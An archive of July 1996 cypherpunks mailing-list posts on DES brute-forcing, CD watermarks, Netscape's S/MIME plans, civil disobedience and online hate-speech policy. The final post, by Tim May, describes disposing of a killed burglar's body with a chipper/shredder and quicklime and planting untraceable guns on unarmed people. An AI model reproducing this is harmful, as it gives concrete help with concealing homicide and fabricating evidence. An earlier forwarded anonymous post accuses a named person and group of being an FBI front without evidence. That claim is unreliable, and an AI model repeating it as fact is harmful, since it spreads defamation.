Kinda like the CDA an Clinton saying "we will not enforce this...."  
Fine, but there is still a law on the books that allows them to if 
they decide to change their mind.  Even if you can't be found guilty, 
you could still be ruined by legal fees, job loss, etc.

> ("Alice's Restaurant" not to the contrary; the confession to Officer Obie
> cinched his fate.)

Don't wanna end up on that "Group-W" bench!  :)

> >  It would be trivial to add a digital ID signal at,
> >say 30,000 or 15 or something like that.  This could then be decoded,
> 
> Doubtful. The existing CD standard tops out at a Nyquist limit of about
> 20KHz, with the actual sampling at 44 KHz--but there is simply "nothing" at
> above 20-22KHz. Putting a signal in at "30 KHz" is simply not possible,
> given the Nyquist Theorem and the CD sampling rate.

Cds are often sampled at 48 these days.  Mine was, and we had to 
reduce it to 44.1 for mass producing (much to our surprise, since 
many CD manufacturers love getting stuff at 48 over 44.1)

Not familiar with the Nyquist limit w/ regards to sampling rate vs 
frequency :(

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jul 1996 18:14:55 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: [Noise] Hettinga Sees Colors...
Message-ID: <2.2.32.19960723184711.0085912c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:20 PM 7/22/96 -0400, Robert Hettinga wrote:
>Anyway, I was standing there at the monument to the British war dead ;-),
>and said to the kids (ages 15, 13, and 11), "Guys, right here, on this
>spot," (they looked down) " is were America [sic] started. If you could
>imagine the ground here painted red, white and blue, and then the colors
>radiating out from here in all directions", (they looked around) "from the
>Atlantic to the Pacific, to Alaska and Hawaii, and bunch of islands in both
>oceans. Oh, yeah. Even the Moon." Then they looked up.


                   By the rude bridge that arched the flood,
                        Their flag to April's breeze unfurled,
                   Here once the embattled farmer's stood,
                        And fired the shot heard round the world.

See also: http://www.inc.net/~fhs/littour/bridge.html

Relevant to cypherpunks because to steal from Nelson Thall of some Marshall
McLuhan Institute in the latest Wired:  "Ultimately, the power of the
Internet is that it makes you think like a North American.  It allows the
entire world to think and write like North Americans.  This is the agenda of
the Internet.  It goes along with NAFTA."

An *why* is it vital that the world become like 'North Americans' (or, as we
non-Canadians would say 'Americans')?  See my follow-up message.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jul 1996 07:07:00 +0800
To: W Lee Nussbaum <jimbell@pacifier.com>
Subject: Re: Intel, Microsoft doing Internet Phone Software
Message-ID: <2.2.32.19960723184716.0084a5ac@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 7/23/96 -0400, W Lee Nussbaum wrote:
>
>...see IDT's Net2Phone product, at http://www.net2phone.com/; it does 
>what you describe.  Two notes: (1) I haven't used it yet; (2: disclosure) 
>I'm now employed by IDT, though in a different area.
>
> - Lee

Subject of an Economist article:

http://www.economist.com/issue/20-07-96/wb2.html

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sharma <sharma@aa.net>
Date: Wed, 24 Jul 1996 20:19:15 +0800
To: cypherpunks@toad.com
Subject: the VTW---FBI Connection (fwd)
Message-ID: <Pine.LNX.3.94.960723144843.21461A-100000@big.aa.net>
MIME-Version: 1.0
Content-Type: text/plain



I am asking for some verification that you (cypherpunks) have something to
do with this before I forward it anywhere. I looked at the vertexgroup and
so-oregon webpages, and there is no investigative journalism there that I
was able to find. Please get back to me soon.

Thanks,

sharma

sharma@aa.net


>X-URL: <URL:http://www.vertexgroup.com>
>X-URL: <URL:http://www.program.com>
>X-URL: <URL:http://www.so-oregon.com>

>
>>Date: Sun, 21 Jul 1996 20:51:23 -0600
>>To: cypherpunks@toad.com
>>From: nobody@zifi.genetics.utah.edu (Anonymous)
>>
>>We have received information that VTW is run and supported by the FBI,
>>which we have suspected for reasons listed here.
>>
>>I) They appear to have no financial support or funding source. They
>>do not accept donations. They have no corporate funds. And yet they
>>appear to be a thriving business.
>>
>>II) They are secretive about their location, and do not seem to have
>>a headquarters. The address listed in the NIC is a vacant lot in of
>>all places Brooklyn, NY. They do not have a listed telephone.
>>
>>III) On a tip from a "friend" we learned that the power leader behind VTW
>>is a cleancut man with the unusual name "Shabbir M. Safdar." Not exactly
>>a common name. Several people say they've met him. Our "friend" says
>>that Mr. Safdar is in reality an agent of the FBI.
>>
>>IIII) We didn't believe this without external verification. So we called
>>the Brooklyn office of the FBI and asked for Agent Safdar. No such person.
>>I called the Washington office. No such person. Checked if there is
>>any agent named Safdar. They don't give out this info. Then we tried to find
>>ANY public records on a Safdar, with no luck. No driver's license in NY,
>DC, NJ,
>>etc. No phone, etc. Odd that such a person does not exist and yet runs a
>>"human rights" organization? Then Alice called the NY FBI office. Asked for
>>Agent Safdar. Guess what? "He's not in. Can I take a message". No message,
>>thanks. He'll get the message all right.
>>
>>Now the big question: What is the FBI trying to do getting all these
>>names? What else has "VTW" been doing? And what other organizations like
>>them are there? Who else is in on it? What does this say about EPIC, CDT, EFF?
>>Are Blaze and Schneier dupes, or willing participants? What about their
>>ISP? I think we are all owed an explanation. This is serious. Maybe FOIA or
>>a lawsuit before they burn the files.
>>
>>What do you want to bet "VTW" quietly fades away after a few prefunctory
>>denials, and gets replaced by another organization in due course?
>>
>>Faithfully,
>>
>>Net reporter team Alice and Bob
>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jul 1996 17:32:23 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607232200.PAA25339@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:03 AM 7/24/96 -0700, Timothy C. May wrote:


>>Not familiar with the Nyquist limit w/ regards to sampling rate vs
>>frequency :(
>
>Check any textbook, or even a good dictionary. Basically, it says that one
>must sample at more than twice the frequency of the highest frequency to be
>reconstructed. Thus, a 20 KHz top frequency needs at least 40 K samples per
>second. The exact number is, I think, about 2.2x the freqency, which is why
>CDs were standardized at 44 K samples per second per channel.

No, Tim, the minimum Nyquist sample frequency _is_ precisely 2.000 times the 
highest frequency to be recovered.  However, what is somewhat less 
well-known is the fact that in order to keep higher frequencies from being 
"aliased" (reflected to lower frequencies by heterodyne processes) it is 
necessary to remove (by filtering) any frequency content above that maximum, 
before sampling is done.  Real-world filters (at least, _economical_ ones) 
do not have instantaneous cutoffs, so it is necessary to provide a little 
margin, in this case about 10%.

Fortunately, a play-only CD only needs output filters, and the input data 
(the CD disk itself) has already been limited to about 20 kilohertz, so its 
requirements are not so stringent.

The reason so-called "oversampling" started to be done on CD players is that 
interpolating digitally between samples results in a far higher aliased noise 
frequencies, allowing  either better performance with the same-quality of 
filters, or equal quality with lower-cost filters, or a combination of them 
both.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Wed, 24 Jul 1996 19:30:43 +0800
To: tcmay@got.net
Subject: Re: Brute-forcing DES
Message-ID: <9607232216.AA22925@supernova.netapp.com>
MIME-Version: 1.0
Content-Type: text/plain


>>At 3:06 AM 7/23/96, Steve Reid wrote:
>>Did you consider the possibility of DES chips in your back-of-the-envelope
>>calculations? They are hundreds of times faster than PCs. I don't know
>>where to get them or how much they cost, though. I would expect they
>>wouldn't be too expensive. The cash might be better spent on DES chips
>>than on a prize.
 
>Specialized DES-cracker chips have of course been considered.
 
Actually hardware DES can be thousands of times faster than PCs.  The 
problem with using commercially available DES chips is that you need to
load keys, do encrypts and XOR the output with the ciphertext looking
for all 0's or all 1's, in a serial fashion.  Commercial DES chips 
don't have the facilities for doing comparisons or loading a new key while
encrypting with the previous, not to mention the ability to increment the
key value.
 
>The advantage of the cracks done last year, the French and Australian
>cracks, and the MIT cracks, were that the "entry costs" for joining the
>project were low.
 
>--Tim May
 
The lowest cost entry for hardware crackers would probably be FPGA based
(lower NRE).  I could design one that would do say 2 - 4 million DES ops
per second and cost less than 60 dollars (a PCI interface and cheap 
card).  Anyway, hardware cracking can be done on a smaller scale than Wieners 
30 Million DES ops/second, and it could still prove valuable.  
 
The good news is that software and hardware efforts are no more incompatible
than using different performing machines.  If someone steps forward with
1728 Giga DES ops machine, they can have as much of the key space as they
can handle.  I could probably manage a 100 M DES ops hardware machine before
my wife wondered what I was spending the money for the new driveway on (and
I would use reprogrammable FPGAs).  I would also be inclined to run software
on a couple of workstations at home, and an incidental PC or Alpha at work.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 16:49:45 +0800
To: cypherpunks@toad.com
Subject: Re: Brute-forcing DES
Message-ID: <ae19b23816021004520c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:06 AM 7/23/96, Steve Reid wrote:
>> Any one up for a distributed brute force attack on single DES? My
>> back-of-the-envelope calculations and guesstimates put this on the
>> hairy edge of doability (the critical factor is how many machines can
>> be recruited - a non-trivial cash prize would help).
>
>Count me in. I've got a couple of net-connected Pentiums that are mostly
>idle.
>
>Did you consider the possibility of DES chips in your back-of-the-envelope
>calculations? They are hundreds of times faster than PCs. I don't know
>where to get them or how much they cost, though. I would expect they
>wouldn't be too expensive. The cash might be better spent on DES chips
>than on a prize.

Specialized DES-cracker chips have of course been considered. Diffie and
Hellman's nearly 20-year-old paper on cracking DES considered this.
Wiener's calculation of a few years ago did more that this: he also
architected a basic system. And the "how many bits is enough?" (sorry I
don't have the official name on the tip of my tongue) panel considered such
designs last year.

But actually building a DES cracker entails a level of commitment very
difficult to achieve in an informal, volunteer effort. Not exactly
something that 10 or 20 people can work on usefully.

The advantage of the cracks done last year, the French and Australian
cracks, and the MIT cracks, were that the "entry costs" for joining the
project were low.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 24 Jul 1996 01:53:21 +0800
To: cypherpunks@toad.com
Subject: Re: Another fascist
Message-ID: <199607231331.PAA12009@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <v03007807ae1a03b2bb71@[192.187.162.15]> you wrote:
: One of the great friends of free speech on this list sent a forged cancel
: message to the listbot to try to cancel my subscription.

: The listbot, being reasonably well designed, ignored him and told me about
: it, though I have no doubt less of a dunce could bring it off.

: What a piece of slime! What do others think of this practice?

: David


Why, David, did you decide to subscribe to cypherpunks ?

bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SOMSER BBS <somser@besos.hnet.es>
Date: Wed, 24 Jul 1996 14:48:02 +0800
To: cypherpunks@toad.com
Subject: new bbs
Message-ID: <1.5.4.32.19960723143827.0070838c@hnet.es>
MIME-Version: 1.0
Content-Type: text/plain


You are going to receive a week to all our areas for free.
You will have access to all the files of our BBS (Except Adult)
for one hour each day.
Your week will expire on 30-7-96
ID 25324
PASSWORD 19062


Le hemos obsequiado con una semana gratuita a nuestro bbs
Podra acceder a todas las areas excepto a las de adultos
La semana gratis termina el 30-7-96
NOMBRE 25324
CLAVE 19062


WEB (SOMSER BBS)
This BBS is being operated in Spain and its address is
http://www.somser.hnet.es (194.177.1.171)
We are now in a test period and operational every day from 20:00 to 05:00 GMT
and from
10:00 to 13:00 GMT.
20.000 files. 10 GB on disk. No CDROM
50 news files per day
plus 200 areas.

Welcome! Be our guest!
======================

We would be thankful if you send your opinion and your
comments to the sysop in order so the BBS can be improved.

If you desire a utility or program that you don't find
leave a message to the sysop and we will attempt to get it.

Hundreds of stages for DOOM, HERETIC, DESCENT, SIMCITY, SIMTOWER, WARCARFT,
etc.





WEB (SOMSER BBS)
Nuevo BBS que es un BBS, el primero que existe en España
La dirección es:
http://www.somser.hnet.es     (194.177.1.171)
Estamos en periodo de pruebas y está en funcionamiento
desde las 22:00 a las 8:00 y desde las 12:00 a las 15.00 GMT
Tenemos más de 20.000 en disco. 10GB sin CDROM
50 ficheros nuevos cada día.
Más de 200 areas diferentes.

Estais invitados, esperamos vuestra conexion.

Agradeceria que dejaran su opinion y sus
comentarios al sysop para poderlo mejorar.

Si desea una utilidad o programa que no encuentra deje
un mensaje al sysop e intentaremos conseguirla

Cientos de escenarios para los juegos del DOOM, HERETIC, DESCENT, WARCARFT,
SIMCITY, ETC.

 HERETIC, DESCENT, WARCARFT, SIMCITY, ETC.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Wed, 24 Jul 1996 12:23:05 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607231854.LAA28030@netcom7.netcom.com>
Message-ID: <9607231938.AA01857@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




>I don't understand this conclusion.  One book people aside, it is generally
>believed that humans evolved in an evolutionary context and they certainly
>frequently use cooperative strategies.  Cooperation usually also involves
>the ability to sanction misbehavior.  Unilateral disarmament is throwing
>away your sanction.

That depends on the circumstances. If you are arguing the case for 
unilateral disarmament or unilateral reduction. In many cases there was a
deliberated attempt to confuse one with the other. Unilateral 
reduction can be the right move to make.

In the case of a minor nuclear power such as the UK unilateral
disarmament may be the right move if the force is insignificant and
the cost of maintaining it is more than the ecconomy can afford or
if it requires compromise of foreign policy in general to keep
the supplier happy.

Somehow I think it should be obvious that issues such as disarmament
are rather more complex than a theoretical game theory model can
capture. Theory should inform understanding, uncovering cause/effect
relationships. That does not mean that all such relationships can
be captured.

The attempt to move from game theory to nuclear disarmament policy
is a tenuous enough move which works primarily because both sides 
are rational actors who are employing the same ideological and 
analytical framework to achieve a common goal (avoiding mutual 
anihilation). It is an even more tenuous connection to apply it to 
the home burglar situation. Burglars are not rational actors, and
are more likely to have their behaviour determined by drugs or
alcohol than analytical game theory.

The facts are very clear, if you have a handgun in the house it is
far more likely to kill a member of the familly than stop an
intruder. The NRA know this which is why they have lobbied for the
CDC to stop research in this area - they do not like the facts.

As someone who qualifies to be issued with a handgun under the UK
regulations I have been informed that the protection offered is
marginal at best. An intruder is certain to be more prepared than
the intended victim, it is extreemly unlikely that the intruder will
not get the first shot in.


		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Wed, 24 Jul 1996 20:19:08 +0800
To: joelm@eskimo.com
Subject: RE: Distributed DES crack
Message-ID: <9607232240.AA24989@supernova.netapp.com>
MIME-Version: 1.0
Content-Type: text/plain


>I'd like to see a very general hardware processing power equivalence table.
>For example, 1 MasPar equals how many Pentiums.

One MasPar MP2 (4K processors) could run 300,000 crypt(3) crack attempts
per second (a password checker).  That should give you 6 or 7 million 
brute force key attempts per second.

Unfortunately the only way to show an equivalance for a particular problem
is to have both machines work on the same problem.  (Perhaps we could manage
to break a DES key in the course of executing a new benchmark?)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 23:00:55 +0800
To: cypherpunks@toad.com
Subject: DES-Busting Screen Savers?
Message-ID: <ae19b70d1702100474bf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:28 PM 7/22/96, aba@atlas.ex.ac.uk wrote:

>Hmm, 56 bits is a lot of bits...
>
>Here's some calcuations of my own for your criticism...

>So ideally for a break you would like the whole thing to be completed
>in say 2 weeks wall clock time, which gives rise to the need for
>~100,000 machines of similar throughput, full-time for two weeks.

Or several times that number of machines or time for machines with less
crunch. Say, 100K Pentium-type machines for a month or two. How might this
be gotten?

A while back I proposed one approach: a brute force "screen saver" for
Windows machines. Other platforms, maybe, but the most cost-effective thing
to do is to go after the Windows market only.

Instead of bouncing balls around the screen, or whatever screen savers like
"After Dark" are doing these days, it could flash messages about "Working
on a crack of ...." and perhaps show bar graphs, etc. Maybe some flashy
graphics, some Cypherpunkish slogans, etc. That is, an attractive enough
screen saver module in its own right that people would be perhaps inclined
to leave it running.

(I know that "After Dark" publishes the specs on its program and encourages
third-party drop-in modules...some have been successful enough to be
marketed by the vendor. I presume this is still the case, and with Windows,
too.)

Acquiring chunks of keyspace remains an issue, but I think we resolved a
while back that a probabalistic method works OK: people just pick chunks at
random, and the decreased efficiency as compared to perfect scheduling is
something like a factor of a couple (I have the numbers I calculated
somewhere, and I recall Hal Finney made the same estimate).

Some means of communicating results--especially wins!--is still needed.
This is where Perry's idea of a Java program is a good one.


>As far as cash prizes go how much could cypherpunks and friends
>generate for such a purpose?  I'd guess individuals could come up with
>a fair bit of money... 1000+ list members x 10$ = 10k (or whatever).

More realistically, 1000+ list members x 10% who make plans to contribute x
half of these who actually follow through x $10 = $500. (If that....)

Prizes have their place, but are hard to set up properly.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 24 Jul 1996 18:53:43 +0800
To: s_levien@research.att.com
Subject: Re: Netscape
In-Reply-To: <Pine.SGI.3.93.3.960723092837.18152A-100000@asparagus.research.att.com>
Message-ID: <31F55981.3009@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien wrote:
> 
> On Tue, 23 Jul 1996, Jeff Weinstein wrote:
> 
> >   I don't like the fact that your proposal ties the size of the
> > bulk encryption key to the size of the public modulus.  There
> > are legitimate reasons why someone might choose to have a 512
> > bit modulus even though they prefer longer bulk encryption keys.
> > Your heuristic would be a good fallback in the absence of more
> > reliable information.
> 
>    I agree. My proposal certainly has its limitations. In addition to the
> one you cite, it will make it very difficult to change away from
> Triple-DES when the time comes.
> 
>    Of course, your hypothetical user who wants to use a 512-bit key and
> 128-bit RC2 is still completely screwed by all currently shipping S/MIME
> products, as well as the S/MIME spec.

  I can't find anything in the S/MIME spec that makes the combination
of 512-bit RSA key and 128-bit RC2 (or 3DES) illegal.  The spec says
that you must support RSA key sizes from 512 to 1024.  Am I missing
something?

> >   There is another method that does not require verisign or other
> > CAs to add key size extensions to their certs.  We can define
> > a new authenticated attribute that gets included in Signed-Data
> > and Signed-And-Enveloped-Data messages that indicates the
> > user's key size and algorithm preference.  This has the advantage
> > that the preference is selected and signed by the user.  This
> > method was discussed at the S/MIME meeting in January at the
> > RSA Crypto conference.  I'm a bit surprised that it never
> > got into the Implementation Guide.  I'll make sure that
> > we bring it up on the smime list again.
> 
>    I don't like the fact that your proposal leaves clients with absolutely
> no information about symmetric cipher choice until the first round of
> signed messages has been exchanged. In this initial round, the protocol is
> still dependent on the global default.

  How did you get the certificate of the recipient?  I assume that you
got it from a degenerate PKCS#7 Signed-Data message as recommended by
the s/mime spec.  That degenerate message could contain the attribute
I describe.  If you got the certificate by some other means, we would
fall back to your heuristic.

> P.S. Can we agree not to describe 128-bit RC2 as "strong crypto" until
> it's been subject to more serious scrutiny? It's probably a great cypher,
> but most cautious crypto-people would far rather place their trust in
> Triple-DES.

  Certainly.  We will definitely offer 3DES as well as RC2 in our
product.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 24 Jul 1996 18:00:00 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape
In-Reply-To: <v02120d21ae1aa90b967e@[192.0.2.1]>
Message-ID: <31F55A79.3174@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 1:23 7/23/96, Jeff Weinstein wrote:
> 
> >  If you know that the recipient can read a message encrypted with
> >3DES, IDEA, or RC2-128, then you can send the message using one of
> >these strong algorithms.  Given that you need someones public key
> >to send them a message, there are several obvious ways to transmit
> >information about what algorithms they accept along with it.
> 
> Granted. What about the signature bug? Will Netscape encrypt the outside
> signature?

  I think that this bug in s/mime should have been fixed long ago.
We will try to get this fixed in the spec before our products
goes out.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Wed, 24 Jul 1996 18:07:19 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Netscape
In-Reply-To: <Pine.LNX.3.94.960723185632.973C-100000@switch.sp.org>
Message-ID: <31F55B33.446B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
>
>> You should only break rules of style if you can   | Tom Weinstein
>> coherently explain what you gain by so doing.     | tomw@netscape.com
>
> Style is standing up for what you beleive in.  Netscape obviously has
> none, or they would be activly fighting the ITAR.

Anyone who believes that Netscape is not actively fighting ITAR is a
fool.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jul 1996 19:42:09 +0800
To: David Sternlight <ota+@transarc.com>
Subject: Re: Netscape
Message-ID: <199607232310.QAA29698@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 7/23/96 -0700, David Sternlight wrote:
>At 5:09 PM -0700 7/22/96, Ted Anderson wrote:
>>
>>I must agree with Lucky.  I am quite sure that even if Netscape was not
>>begin distributed over the net, copies would still be uploaded to
>>international sites by folks practicing Civil disobedience.
>
>To call simple lawbreaking by cowards working in secret "civil
>disobedience" is to defame the name of Gandhi, King, and all the legitimate
>protesters of modern history. Civil disobedience must be seen publicly, and
>must be done by observable individuals. Masked men throwing stink bombs is
>not civil disobedience--it's hooliganism.

As usual, while you have at least the hint of a truth there, you manage to 
warp it just enough to be difficult to recognize.

Historically, the the government has had nominal control of the media.  The 
only civil disobedience that was _seen_ to be successful were the examples 
that made the news.  And the "only" examples which made the news were the 
ones the government wanted to publicize.  And the "only" examples the 
government wanted to publicize were the ones in which government 
"successfully" made examples of those doing it.  And the "only" examples 
where the government achieved this were the ones where the perpetrator 
allowed himself to be caught.  (my usages of the word, "only," are somewhat 
hyperbolic, of course.  In practice, they are strong probabilities.)

Your usage of the word, "legitimate" is quite slick (in the worst sense of 
the word, "slick"):  The only ones you're going to want to acknowledge were 
"legitimate" are the ones that either are already successful, or the few you 
approve of and are still waiting to be successful.

So, in a certain odd sense, it has been correct to say that the only 
"successful" (and thus, by your standards, "legitimate") civil disobedience 
has been that in which the perpetrator did it openly. And not surprisingly, 
anyone who does anything in such a way that he's not caught (and therefore, 
is also not subject to government-sponsored publicity) is a "coward" by your 
standards.  How convenient!  A rather sophisticated self-fulfilling 
prophecy.  No wonder you've got some people fooled into believing you're a 
good debator.

Fast-forward to 1996.  Today, the traditional news media is beginning to be 
seriously bypassed by the computer networks, and this process is 
accelerating.  No longer can the government keep enough control of the news 
media in order to help ensure that civil disobedience stays covered up 
unless they catch the protestor. Since everything else seems to be changing, 
it's no surprise that civil disobedience is, too.  

Today, civil disobedience still needs publicity, but to achieve that it now 
DOESN'T need the cooperation of the mainstream media, or implicitly the 
government.  So a person doesn't need to be "caught" in order to win.  The 
_results_ must be publicized, the person or people who did it doesn't.   
This represents a rather enormous change in the whole issue of civil 
disobedience, a change which is extraordinarily unwelcome among governments 
and statists alike.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 24 Jul 1996 20:40:49 +0800
To: cypherpunks@toad.com
Subject: Wiesenthal Center (Canada) and the Ostrich Syndrome (fwd)
Message-ID: <Pine.GUL.3.94.960723161009.15654H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For Skippy.

- ---------- Forwarded message ----------
Date: 23 Jul 1996 08:26:15 -0700
From: Ken McVay OBC <kmcvay@nizkor.almanac.bc.ca>
Newsgroups: alt.revisionism, can.general, alt.censorship, comp.org.eff.talk,
    misc.legal, ont.general, bc.general, talk.politics.misc
Subject: Wiesenthal Center (Canada) and the Ostrich Syndrome

The July 19 article in the Vancouver Sun, "B.C. Internet provider is the
largest Canadian site for racist material" is alarming.  (See URL
http://ftp.nizkor.org/ftp.cgi?orgs/american/wiesenthal.center/press
for a copy of the article.)

It is not the material found on the websites mentioned, nor the fact that 
the host server is Canadian - nor indeed that the server is physically 
located in BC - which give cause for alarm.

It is alarming because - either by deliberate design or by abject ignorance
- - Sol Littman (and the Simon Wiesenthal Center [SWC] whom he represents in
Canada) is fostering and promoting the spread of the "Ostrich Syndrome."
Their actions represent a counter-productive denial of reality - akin to the
Ostrich burying its head in the sand.

Littman is quoted as saying:

        "We found the longer you leave these groups unexposed, 
        the longer they fester and the more they infect others 
        and the only way to deal with them honestly and forcefully 
        is to expose them to the light of truth."

Yet the article concludes, 

        "Littman said he wants to see if Klatt will remove the groups  
        from Fairview voluntarily before the centre takes any other 
        action."

The only truth that seems to emerge from such a veiled threat is that
Littman has no understanding of the Internet.  One is at a loss to determine
how removal of the "groups" from one Internet Provider's server would in any
way "expose them to the light of truth."

If Littman had any knowledge of the Internet, he would know that the Nizkor
Project [http://www.nizkor.org/] is an award winning website that is 
accessed daily by hundreds.  In addition to being a source for those who 
seek information about the facts of the Holocaust, it is used as an 
electronic resource for those who wish to "deal with [these groups] 
honestly and forcefully" thereby exposing Lemire and many others - of 
whom Littman may not even be aware.

Nizkor is arguably the "host" to more hate literature than any other
website.  Since we also include a link to the Zundelsite amongst others,
will Littman next be targetting Nizkor and demanding that we remove such
links?  Or that we hide from public view the mountains of archived material
which meticulously documents and uses the "arguments" put forward by these
groups as instruments of their refutation and exposure?

If Littman and the SWC prefer to bury their heads in the sand while engaging
in this futile exercise in darkness, let them do so.  But the martyrdom they
hand on a platter to Lemire and others whom they find offensive stands in
marked contrast to their failure to use the Internet on their own website.

Conspicuously absent on the SWC website are links to the increasingly
growing number of useful resources for those who truly do wish to
participate in the battle to expose racist and anti-semitic groups on the
Internet.

The Ostrich syndrome is far more dangerous to society than any white
supremacist group on the Internet.  Such groups will fester in darkness, 
but wither in light.

Kenneth McVay, OBC
The Nizkor Project

- -- 
Nizkor Canada          | http://www.nizkor.org
- -----------------------| Prince Myshkin's Troll Bait Sold Here
                       |--------------------------------------
     http://www.nizkor.org/hweb/people/g/giwer-matt/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfVcLJNcNyVVy0jxAQENJQIAwGhMdP82l3S0Ac3uSaYaUcj1TowW6J9F
K+l+wRmWwpQBuxq+INEPghNcY54thnc6iQIqGfR5KVoUsFNLAk9lcg==
=12JK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 17:20:19 +0800
To: cypherpunks@toad.com
Subject: Re: Boobytraps and the American Legal System
Message-ID: <ae19bb7d180210047fa6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 AM 7/23/96, Lucky Green wrote:
>At 12:48 7/23/96, Timothy C. May wrote:
>
>>(Later examples were to be even worse. For example, the burglar who climbed
>>on a roof and stepped through a skylight. He sued, and won. I guess the
>>owner of the property was obligated to install night lights so burglars
>>could see their way, and to generally make his property more
>>"burglar-friendly." Or the woman who sued a hospital, claiming her psychic
>>abilities were lost after a CAT scan. She won.)
>
>And then there was the burglar who cut his hands on razor wire while
>attempting to scale a fence. He too recovered damages from the property
>owner. Some people say that the lesson to be learned form such harsh legal
>realities is to kill burglars on sight. After all, dead people don't sue...

A nice theory, but not true. Their estates can and do sue. Lost income,
mental anguish, the usual stuff. And maybe their insurance companies, if
any claims were paid, would also sue.

No, a better solution it seems to me is to dispose of the body so there is
only a "disappearance," with nothing to link the perp to one's self.
(Unless the perp left records or told someone...)

My place is pretty isolated, so I wonder if my proposed solution is enough:
process with my 10 h.p Troy-Bilt chipper/shredder, treat output with 2
sacks of quicklime, hose resulting product into ravine dropping down to
valley floor below. (Probably too much DNA-carrying crud left around,
should a forensic pathologist ever start nosing around...the old
tried-and-true method of a midnight planting in a remote location, far away
from one's own home, is better.)

BTW, one of the worst aspects of the recent crackdown on gun sales and
transfers is that it's become much harder to get hold of a gun with no
paper trail to one's self. Those of us who used to frequent "gun shows"
have adequate supplies of guns with no traceability back to
ourselves...useful for planting on perps who happened to be unarmed.

--Tim May

Boycott "Big Brother Inside" software!
